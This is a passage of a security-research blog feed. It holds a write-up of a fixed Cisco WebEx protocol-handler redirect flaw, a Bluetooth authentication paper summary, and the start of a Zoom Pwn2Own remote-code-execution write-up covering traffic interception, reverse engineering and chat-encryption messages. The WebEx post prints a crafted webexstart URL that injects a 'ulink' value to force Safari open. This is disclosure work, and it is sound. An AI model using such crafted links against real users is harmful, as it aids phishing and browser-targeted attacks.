Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Cisco WebEx Universal Links Redirect

31 August 2021 at 15:56

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9\/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSW1OdmJXMXZiaUk2SUhzS0lDQWdJQ0FnSUNBaVJHVnNZWGxTWldScGNtVmpkQ0k2SUNKMGNuVmxJZ29nSUNBZ2ZTd0tJQ0FnSUNKM1pXSmxlQ0k2SUhzS0lDQWdJQ0FnSUNBaVNtOXBia1pwY25OMFFteGhZMnRNYVhOMElqb2dXd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJalF4TGpRaUxBb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lqUXhMalVpQ2lBZ0lDQWdJQ0FnWFFvZ0lDQWdmU3dLSUNBZ0lDSmxkbVZ1ZENJNklIc0tDaUFnSUNCOUxBb2odJQ0FnSW5SeVlXbHVhVzVuSWpvZ2V3b0tJQ0FnSUgwc0NpQWdJQ0FpYzNWd2NHOXlkQ0k2SUhzS0lDQWdJQ0FnSUNBaVIzQmpRMjl0Y0c5dVpXNTBUbUZ0WlNJNklDSkRhWE5qYnlCWFpXSmxlQ0JUZFhCd2IzSjBMbUZ3Y0NJS0lDQWdJSDBLZlFvPSIsInVsaW5rIjoiYUhSMGNITTZMeTl0WldWME1URXpMbmRsWW1WNExtTnZiUzkzWW5odGFuTXZhbTlwYm5ObGNuWnBZMlV2YzJsMFpYTXZiV1ZsZERFeE15OXRaV1YwYVc1bkwzTmxkSFZ3ZFc1cGRtVnljMkZzYkdsdWEzTS9jMmwwWlhWeWJEMXRaV1YwTVRFekptMWxaWFJwYm1kclpYazlNVGd5TWpnMk5qTTBOeVpqYjI1MFpYaDBTVVE5YzJWMGRYQjFibWwyWlhKellXeHNhVzVyWHpBek16azFZamN3WmpjMU1UUmpPR1U0TTJJek5qZ3lNV1V4T1dZd05UVXlYekUyTWpNNU5UQTBNVGMzTURZbWRHOXJaVzQ5VTBSS1ZGTjNRVUZCUVZoWVlqVkVMVTFtTUZKZlVXcHFka3BTWkdacmJFRmFZVzkxY1Voa1RYbHVjSFppWHpCS1IyeFJhVEYzTWlac1lXNW5kV0ZuWlQxbGJsOVZVdz09IiwidXRvZ2dsZSI6IjEiLCJtZSI6IjEiLCJqZnYiOiIxIiwidGlmIjoiUEQ5NGJXd2dkbVZ5YzJsdmJqMGlNUzR3SWlCbGJtTnZaR2x1WnowaVZWUkdMVGdpUHo0S1BGUmxiR1ZOWlhSeWVVbHVabTgrUEUxbGRISnBZM05GYm1GaWJHVStNVHd2VFdWMGNtbGpjMFZ1WVdKc1pUNDhUV1YwY21samMxVlNURDVvZEhSd2N6b3ZMM1J6WVRNdWQyVmlaWGd1WTI5dEwyMWxkSEpwWXk5Mk1Ud3ZUV1YwY21samMxVlNURDQ4VFdWMGNtbGpjMUJoY21GdFpYUmxjbk0rUEUxbGRISnBZM05VYVdOclpYUStVbnBJTHk5M1FVRkJRVmhqUkhCSlFTOVFja0ZWSzJGeWFXTnliVEF3TlRjMVpubFZUM0EwVFc4d1NrTnpWVXh0V2pKR1IyTkJQVDA4TDAxbGRISnBZM05VYVdOclpYUStQRU52Ym1aSlJENHhPVGN4T1RnME5UYzBNakkzTnpJek5EYzhMME52Ym1aSlJENDhVMmwwWlVsRVBqRTBNakkyTXpZeVBDOVRhWFJsU1VRK1BGUnBiV1ZUZEdGdGNENHhOakl6T0RZME1ERTNOekEzUEM5VWFXMWxVM1JoYlhBK1BFRlFVRTVoYldVK1UyVnpjMmx2Ymt0bGVUd3ZRVkJRVG1GdFpUNDhMMDFsZEhKcFkzTlFZWEpoYldWMFpYSnpQanhOWlhSeWFXTnpSVzVoWW14bFRXVmthV0ZSZFdGc2FYUjVSWFpsYm5RK01Ud3ZUV1YwY21samMwVnVZV0pzWlUxbFpHbGhVWFZoYkdsMGVVVjJaVzUwUGp3dlZHVnNaVTFsZEhKNVNXNW1iejQ9In0=

While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:

{“uuid”:”8e18fa93cd10432a907c94fb9d3a63e6",”cv”:”41.6.4.8",”cwsv”:”11,41,0604,210608,0",”st”:”MC”,”pv”:”T33_64UMC”,”cn”:”ATCONFUI.BUNDLE”,”flag”:33554432,”ejf”:”2",”cpp”:”ewogICAgImNvbW1vbiI6IHsKICAgICAgICAiRGVsYXlSZWRpcmVjdCI6ICJ0cnVlIgogICAgfSwKICAgICJ3ZWJleCI6IHsKICAgICAgICAiSm9pbkZpcnN0QmxhY2tMaXN0IjogWwogICAgICAgICAgICAgICAgIjQxLjQiLAogICAgICAgICAgICAgICAgIjQxLjUiCiAgICAgICAgXQogICAgfSwKICAgICJldmVudCI6IHsKCiAgICB9LAogICAgInRyYWluaW5nIjogewoKICAgIH0sCiAgICAic3VwcG9ydCI6IHsKICAgICAgICAiR3BjQ29tcG9uZW50TmFtZSI6ICJDaXNjbyBXZWJleCBTdXBwb3J0LmFwcCIKICAgIH0KfQo=”,”ulink”:”aHR0cHM6Ly9tZWV0MTEzLndlYmV4LmNvbS93YnhtanMvam9pbnNlcnZpY2Uvc2l0ZXMvbWVldDExMy9tZWV0aW5nL3NldHVwdW5pdmVyc2FsbGlua3M/c2l0ZXVybD1tZWV0MTEzJm1lZXRpbmdrZXk9MTgyMDIxMDYwOCZjb250ZXh0SUQ9c2V0dXB1bml2ZXJzYWxsaW5rXzNlNjNjZDFlODcyMzRlOTE4OWU2OWM2NjI2MDcxMzBiXzE2MjQwMjA4ODUwNTImdG9rZW49U0RKVFN3QUFBQVd4c0pGelhzSW1Da2l3aHQya2t4TE1WWFdJVFZpTTh4OWVnUWJlejVUaWhBMiZsYW5ndWFnZT1lbl9VUw==”,”utoggle”:”1",”me”:”1",”jfv”:”1",”tif”:”PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPFRlbGVNZXRyeUluZm8+PE1ldHJpY3NFbmFibGU+MTwvTWV0cmljc0VuYWJsZT48TWV0cmljc1VSTD5odHRwczovL3RzYTMud2ViZXguY29tL21ldHJpYy92MTwvTWV0cmljc1VSTD48TWV0cmljc1BhcmFtZXRlcnM+PE1ldHJpY3NUaWNrZXQ+UnpILy93QUFBQVVoVE5VSXhKcThuKzR4N0djY2c5S1NFRWFqVHZ2aDQrWkxLSmIzTnh3aElnPT08L01ldHJpY3NUaWNrZXQ+PENvbmZJRD4xOTczMDMyMzQxNzY1MTQ3NDE8L0NvbmZJRD48U2l0ZUlEPjE0MjI2MzYyPC9TaXRlSUQ+PFRpbWVTdGFtcD4xNjIzOTM0NDg1MDUyPC9UaW1lU3RhbXA+PEFQUE5hbWU+U2Vzc2lvbktleTwvQVBQTmFtZT48L01ldHJpY3NQYXJhbWV0ZXJzPjxNZXRyaWNzRW5hYmxlTWVkaWFRdWFsaXR5RXZlbnQ+MTwvTWV0cmljc0VuYWJsZU1lZGlhUXVhbGl0eUV2ZW50PjwvVGVsZU1ldHJ5SW5mbz4=”}

From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks?siteurl=meet113&meetingkey=1820210608&contextID=setupuniversallink_3e63cd1e87234e9189e69c662607130b_1624020885052&token=SDJTSwAAAAWxsJFzXsImCkiwht2kkxLMVXWITViM8x9egQbez5TihA2&language=en_US

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “reddit.com” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that a given attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to https://tenable.com:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSUNBZ0lDSmpiMjF0YjI0aU9pQjdDaUFnSUNBZ0lDQWdJa1JsYkdGNVVtVmthWEpsWTNRaU9pQWlabUZzYzJVaUNpQWdJQ0I5TEFvZ0lDQWdJbmRsWW1WNElqb2dld29nSUNBZ0lDQWdJQ0pLYjJsdVJtbHljM1JDYkdGamEweHBjM1FpT2lCYkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaU5ERXVOQ0lzQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FpTkRFdU5TSUtJQ0FnSUNBZ0lDQmRDaUFnSUNCOUxBb2dJQ0FnSW1WMlpXNTBJam9nZXdvS0lDQWdJSDBzQ2lBZ0lDQWlkSEpoYVc1cGJtY2lPaUI3Q2dvZ0lDQWdmU3dLSUNBZ0lDSnpkWEJ3YjNKMElqb2dld29nSUNBZ0lDQWdJQ0pIY0dORGIyMXdiMjVsYm5ST1lXMWxJam9nSWtOcGMyTnZJRmRsWW1WNElGTjFjSEJ2Y25RdVlYQndJZ29nSUNBZ2ZRb2dJQ0FnZlFvZ0lDQWciLCJ1bGluayI6ImFIUjBjSE02THk5MFpXNWhZbXhsTG1OdmJRPT0iLCJ1dG9nZ2xlIjoiMSIsIm1lIjoiMSIsImpmdiI6IjEiLCJ0aWYiOiJQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpVlZSR0xUZ2lQejQ4VkdWc1pVMWxkSEo1U1c1bWJ6NDhUV1YwY21samMwVnVZV0pzWlQ0d1BDOU5aWFJ5YVdOelJXNWhZbXhsUGp4TlpYUnlhV056VlZKTVBtaDBkSEJ6T2k4dmRITmhNeTUzWldKbGVDNWpiMjB2YldWMGNtbGpMM1l4UEM5TlpYUnlhV056VlZKTVBqeE5aWFJ5YVdOelVHRnlZVzFsZEdWeWN6NDhUV1YwY21samMxUnBZMnRsZEQ1U2VrZ3ZMM2RCUVVGQldHTkVjRWxCTDFCeVFWVXJZWEpwWTNKdE1EQTFOelZtZVZWUGNEUk5iekJLUTNOVlRHMWFNa1pIWTBFOVBUd3ZUV1YwY21samMxUnBZMnRsZEQ0OFEyOXVaa2xFUGpFNU56RTVPRFExTnpReU1qYzNNak0wTnp3dlEyOXVaa2xFUGp4VGFYUmxTVVErTVRReU1qWXpOakk4TDFOcGRHVkpSRDQ4VkdsdFpWTjBZVzF3UGpFMk1qTTROalF3TVRjM01EYzhMMVJwYldWVGRHRnRjRDQ4UVZCUVRtRnRaVDVUWlhOemFXOXVTMlY1UEM5QlVGQk9ZVzFsUGp3dlRXVjBjbWxqYzFCaGNtRnRaWFJsY25NK1BFMWxkSEpwWTNORmJtRmliR1ZOWldScFlWRjFZV3hwZEhsRmRtVnVkRDR4UEM5TlpYUnlhV056Ulc1aFlteGxUV1ZrYVdGUmRXRnNhWFI1UlhabGJuUStQQzlVWld4bFRXVjBjbmxKYm1adlBnPT0ifQ==

The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

Now, obviously, I want to emphasize that this flaw is relatively complex as it requires user interaction and is of relatively low impact. For starters, this attack already requires an attacker to trick a user into visiting a malicious link (providing a fake meeting invite via a custom domain for example) and then allowing WebEx to launch from their browser. In this case, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue due to no security boundary being crossed; that’s too silly for even me to report. In this case, however, there is a security boundary being crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame, but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)


Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Issues with Indefinite Trust in Bluetooth

25 August 2021 at 14:37

At IncludeSec we of course love to hack things, but we also love to use our skills and insights into security issues to explore innovative solutions, develop tools, and share resources. In this post we share a summary of a recent paper that I published with fellow researchers in the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec’21). WiSec is a conference well attended by people across industry, government, and academia; it is dedicated to all aspects of security and privacy in wireless and mobile networks and their applications, mobile software platforms, Internet of Things, cyber-physical systems, usable security and privacy, biometrics, and cryptography. 

Overview

Recurring Verification of Interaction Authenticity Within Bluetooth Networks
Travis Peters (Include Security), Timothy Pierson (Dartmouth College), Sougata Sen (BITS GPilani, KK Birla Goa Campus, India), José Camacho (University of Granada, Spain), and David Kotz (Dartmouth College)

The most common forms of authentication are passwords, potentially used in combination with a second factor such as a hardware token or mobile app (i.e., two-factor authentication). These approaches emphasize a one-time, initial authentication. After initial authentication, authenticated entities typically remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires. Unfortunately, explicit deauthentication happens rarely, if ever. To address this issue, recent work has explored how to provide passive, continuous authentication and/or automatic de-authentication by correlating user movements and inputs with actions observed in an application (e.g., a web browser). 

The issue with indefinite trust, however, goes beyond user authentication. Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact as long as the devices exist, or until they transfer ownership (e.g., sold or lost).

The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security makes indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised. Thus, I put forth the argument with my academic research colleagues that one-time, single-factor, device-to-device authentication (i.e., an initial pairing) is not enough, and that there must exist some mechanism to frequently (re-)verify the authenticity of devices and their connections.

In our paper we propose a device-to-device recurring authentication scheme – Verification of Interaction Authenticity (VIA) – that is based on evaluating characteristics of the communications (interactions) between devices. We adapt techniques from wireless traffic analysis and intrusion detection systems to develop behavioral models that capture typical, authentic device interactions (behavior); these models enable recurring verification of device behavior.

Technical Highlights

  • Our recurring authentication scheme is based on off-the-shelf machine learning classifiers (e.g., Random Forest, k-NN) trained on characteristics extracted from Bluetooth/BLE network interactions. 
  • We extract model features from packet headers and payloads. Most of our analysis targets lower-level Bluetooth protocol layers, such as the HCI and L2CAP layers; higher-level BLE protocols, such as ATT, are also information-rich protocol layers. Hybrid models – combining information extracted from various protocol layers – are more complex, but may yield better results.
  • We construct verification models from a combination of fine-grained and coarse-grained features, including n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality (ingress vs. egress). 
Our verification scheme can be deployed anywhere that interposes on Bluetooth communications between two devices. One example we consider is a deployment within a kernel module running on a mobile platform.

Other Highlights from the Paper 

  • We collected and presented a new, first-of-its-kind Bluetooth dataset. This dataset captures Bluetooth network traces corresponding to app-device interactions between more than 20 smart-health and smart-home devices. The dataset is open-source and available within the VM linked below.
  • We enhanced open-source Bluetooth analysis software – bluepy and btsnoop – in an effort to improve the available tools for practical exploration of the Bluetooth protocol and Bluetooth-based apps.
  • We presented a novel modeling technique, combined with off-the-shelf machine learning classifiers, for characterizing and verifying authentic Bluetooth/BLE app-device interactions.
  • We implemented our verification scheme and evaluated our approach against a test corpus of 20 smart-home and smart-health devices. Our results show that VIA can be used for verification with an F1-score of 0.86 or better in most test cases.

To learn more, check out our paper as well as a VM pre-loaded with our code and dataset

Final Notes

Reproducible Research

We are advocates for research that is impactful and reproducible. At WiSec’21 our published work was featured as one of four papers this year that obtained the official replicability badges. These badges signify that our artifacts are available, have been evaluated for accuracy, and that our results were independently reproducible. We thank the ACM the WiSec organizers for working to make sharing and reproducibility common practice in the publication process. 

Next Steps

In future work we are interested in exploring a few directions:

  • Continue to enhance tooling that supports Bluetooth protocol analysis for research and security assessments
  • Expand our dataset to include more devices, adversarial examples, etc. 
  • Evaluate a real-world deployment (e.g., a smartphone-based multifactor authentication system for Bluetooth); such a deployment would enable us to evaluate practical issues such as verification latency, power consumption, and usability. 

Give us a shout if you are interested in our team doing bluetooth hacks for your products!

The post Issues with Indefinite Trust in Bluetooth appeared first on Include Security Research Blog.

Homemade Fuzzing Platform Recipe

By: voidsec
25 August 2021 at 13:11

It’s no secret that, since the beginning of the year, I’ve spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process. Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing […]

The post Homemade Fuzzing Platform Recipe appeared first on VoidSec.

Zoom RCE from Pwn2Own 2021

23 August 2021 at 00:00

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
  1. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
